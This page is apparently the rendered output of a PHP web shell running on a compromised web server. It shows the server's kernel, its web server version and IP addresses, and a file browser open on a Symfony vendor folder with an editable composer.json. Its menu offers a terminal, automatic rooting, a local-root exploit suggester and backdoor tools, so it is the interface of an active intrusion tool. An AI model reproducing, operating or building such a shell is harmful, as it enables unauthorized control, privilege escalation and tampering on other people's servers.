Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 18.224.137.108
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
unp-test /
vendor /
symfony /
contracts /
Delete
Unzip
Name
Size
Permission
Date
Action
Cache
[ DIR ]
drwxr-xr-x
2018-11-24 09:35
Service
[ DIR ]
drwxr-xr-x
2018-11-24 09:35
Tests
[ DIR ]
drwxr-xr-x
2018-11-24 09:35
Translation
[ DIR ]
drwxr-xr-x
2018-11-24 09:35
.gitignore
34
B
-rw-r--r--
2018-11-24 09:35
CHANGELOG.md
636
B
-rw-r--r--
2018-11-24 09:35
LICENSE
1.04
KB
-rw-r--r--
2018-11-24 09:35
README.md
3.27
KB
-rw-r--r--
2018-11-24 09:35
composer.json
1.24
KB
-rw-r--r--
2018-11-24 09:35
phpunit.xml.dist
827
B
-rw-r--r--
2018-11-24 09:35
Save
Rename
{ "name": "symfony/contracts", "type": "library", "description": "A set of abstractions extracted out of the Symfony components", "keywords": ["abstractions", "contracts", "decoupling", "interfaces", "interoperability", "standards"], "homepage": "https://symfony.com", "license": "MIT", "authors": [ { "name": "Nicolas Grekas", "email": "p@tchwork.com" }, { "name": "Symfony Community", "homepage": "https://symfony.com/contributors" } ], "require": { "php": "^7.1.3" }, "require-dev": { "psr/cache": "^1.0", "psr/container": "^1.0" }, "suggest": { "psr/cache": "When using the Cache contracts", "psr/container": "When using the Service contracts", "symfony/cache-contracts-implementation": "", "symfony/service-contracts-implementation": "", "symfony/translation-contracts-implementation": "" }, "autoload": { "psr-4": { "Symfony\\Contracts\\": "" }, "exclude-from-classmap": [ "**/Tests/" ] }, "minimum-stability": "dev", "extra": { "branch-alias": { "dev-master": "1.0-dev" } } }